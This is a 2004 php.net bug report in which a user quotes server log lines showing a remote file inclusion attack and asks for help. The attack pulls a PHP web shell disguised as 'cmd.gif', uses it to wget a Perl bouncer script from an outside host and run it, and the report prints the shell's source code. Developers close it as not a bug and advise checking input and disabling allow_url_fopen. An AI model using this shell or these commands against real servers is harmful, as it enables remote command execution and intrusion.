php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #30236 File Injection (Gif, Jpg, txt)
Submitted: 2004-09-26 02:02 UTC Modified: 2004-09-26 02:35 UTC
From: wschow at comp dot hkbu dot edu dot hk Assigned:
Status: Not a bug Package: *General Issues
PHP Version: 5.0.1 OS: Solaris 2.6
Private report: No CVE-ID: None
View Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
If you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: wschow at comp dot hkbu dot edu dot hk
New email:
PHP Version: OS:

 

 [2004-09-26 02:02 UTC] wschow at comp dot hkbu dot edu dot hk 
Description:
------------
It seems that PHP 5.0.2 has file injection problem as such:

200.164.94.78 - - [25/Sep/2004:08:29:37 +0800] "GET /~ABC/test/index1.php?page
=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20tmp/rm%20-rf%20bnc.pl;rm%20-rf%20
bnc.pid HTTP/1.1" 200 6714
200.165.82.160 - - [25/Sep/2004:23:02:24 +0800] "GET /~ABC/test/index1.php?pag
e=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20/tmp;wget%20members.lycos.co.uk/
spakk/bnc.pl HTTP/1.1" 200 7139
200.165.82.160 - - [25/Sep/2004:23:04:35 +0800] "GET /~ABC/test/index1.php?pag
e=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20/tmp;perl%20bnc.pl%20-p%201718%2
0-s%20cfcfclols HTTP/1.1" 200 6714

In http://h4ck3rscan.port5.com/cmd.gif, it shows the source:
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>

Any solutions?

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2004-09-26 02:29 UTC] rasmus@php.net 
What is index1.php ?
 [2004-09-26 02:35 UTC] alan_k@php.net 
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

check your input variables.. and/or use
allow_url_fopen = off
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Mon Nov 25 11:01:33 2024 UTC